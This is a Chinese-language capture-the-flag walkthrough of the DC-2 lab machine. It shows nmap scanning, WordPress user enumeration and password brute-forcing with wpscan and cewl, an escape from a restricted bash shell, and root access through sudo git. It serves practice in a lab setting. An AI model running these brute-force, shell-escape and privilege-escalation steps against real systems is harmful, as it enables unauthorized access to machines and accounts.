DC-2

今天无所事事，又来搞靶机了，少搞这个，打算搞完DC系列再去加深学习一下，该学习学习eviden师傅的fofa教程了

本机ip ： 192.168.56.135
目标ip ： 192.168.56.147

信息收集

nmap扫描本地ip，主机发现 -sP，是用于内网主机探测

nmap -sP 192.168.56.135/24

端口扫描
nmap -A -p- 192.168.56.147
对靶机ip的全端口详细扫描，发现两个应用分别是80和7744端口，http和ssh

渗透测试

修改hosts

访问对应的web站点，发现了域名跳转，需要我们更改hosts文件，将域名指向靶机ip

vim /etc/hosts

再次访问，进入主页面，发现flag，让我们爆破账户

wpscan爆破账户

登录网站后进行指纹识别，可以用whatweb或者wapper
，发现是由wordpress搭建的

whatweb 192.168.56.147

进行目录扫描，查找管理员页面,发现后台管理页面
dirb http://dc-2/

似乎有个专门的wordpress工具wpscan，使用wpscan进行扫描,常用语句：
wpscan –url http://dc-2 扫描版本
wpscan –url http://dc-2 –enumerate t 扫描主题
wpscan –url http://dc-2 –enumerate p 扫描插件
wpscan –url http://dc-2 –enumerate u 枚举用户

扫描版本发现版本为4.7.10，并利用wpscan枚举用户

发现三个用户admin，jerry，tom

根据flag1用cewl来生成字典，并进行爆破

cewl http://dc-2/ > 1.txt 生成字典
Cewl（Custom Word List Generator）是一个用 Ruby 编写的应用程序，它可以爬取指定 URL 的内容，并根据用户设定的参数和选项，生成自定义的字典文件。这些字典文件可以用于密码猜测、暴力破解等攻击场景，从而提高渗透测试的成功率

wpscan –url http://dc-2 –passwords 1.txt 爆破密码，发现jerry和tom的密码

jerry/adipiscing
tom/parturient

尝试用jerry登录，发现flag2，并提示我们使用ssh登录

ssh登录

ssh tom@192.168.56.147 -p 7744

成功登录，发现在本地有flag3，但是只有vi可用，这个叫我们提权

rbash提权

查看当前权限的软件

利用echo来绕过rbash

拿到jerry用户权限
export -p //查看环境变量
BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/ //添加环境变量
export PATH=$PATH:/usr/bin //添加环境变量

查看可以使用root权限的命令

find / -user root -perm -4000 -print 2>/dev/null

su jerry 利用su获取jerry的权限，这时密码就可以用了
现在就可以越权查看jerry的falg4，提示我们用git提权

sudo -l 发现可以用git软件

sudo git help status

查看git的命令,在配置页面的命令行输入
!/bin/sh,即可提权

##总结
至此已经完成，知识点有比如wpscan的用法，git的提权，rbash的绕过